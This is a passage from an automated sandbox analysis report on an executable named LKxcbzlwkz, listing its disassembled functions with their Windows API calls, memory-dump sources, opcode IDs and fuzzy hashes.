                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                            • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                            • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                                                                                                                                                            • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                                                                                                                                                                                            Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Long
                                                                                                                                                                                                                                                            • String ID: SysTreeView32
                                                                                                                                                                                                                                                            • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                            • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                                                                                                                                                            • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                                                                                                                                                                                            Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                            • String ID: AU3_GetPluginDetails
                                                                                                                                                                                                                                                            • API String ID: 145871493-4132174516
                                                                                                                                                                                                                                                            • Opcode ID: 7462e7a4be706704e87074ba6d3187b11a665093027c485f5be76ba404333de2
                                                                                                                                                                                                                                                            • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7462e7a4be706704e87074ba6d3187b11a665093027c485f5be76ba404333de2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                                                                                                                                                                                            Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$Window
                                                                                                                                                                                                                                                            • String ID: SysMonthCal32
                                                                                                                                                                                                                                                            • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                            • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                                                                                                                                                            • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                                                                                                                                                                                            Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DestroyWindow
                                                                                                                                                                                                                                                            • String ID: msctls_updown32
                                                                                                                                                                                                                                                            • API String ID: 3375834691-2298589950
                                                                                                                                                                                                                                                            • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                                                                                                                                                            • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                                                                                                                                                                                            Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _memmove
                                                                                                                                                                                                                                                            • String ID: $<
                                                                                                                                                                                                                                                            • API String ID: 4104443479-428540627
                                                                                                                                                                                                                                                            • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                                                                                                                                                                            • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                                                                                                                                                                                            Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                                                                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                                                            • String ID: \VH
                                                                                                                                                                                                                                                            • API String ID: 1682464887-234962358
                                                                                                                                                                                                                                                            • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                                                                                                                                                            • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                                                                                                                                                                                            Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                                                                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                                                            • String ID: \VH
                                                                                                                                                                                                                                                            • API String ID: 1682464887-234962358
                                                                                                                                                                                                                                                            • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                                                                                                                                                            • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                                                                                                                                                                                            Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                                                                                                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                                                                                            • String ID: \VH
                                                                                                                                                                                                                                                            • API String ID: 1682464887-234962358
                                                                                                                                                                                                                                                            • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                                                                                                                                            • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                                                                                                                                                                            Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                            • String ID: \VH
                                                                                                                                                                                                                                                            • API String ID: 2507767853-234962358
                                                                                                                                                                                                                                                            • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                                                                                                                                            • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                                                                                                                                                                            Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                            • String ID: \VH
                                                                                                                                                                                                                                                            • API String ID: 2507767853-234962358
                                                                                                                                                                                                                                                            • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                                                                                                                                            • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                                                                                                                                                                                            Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
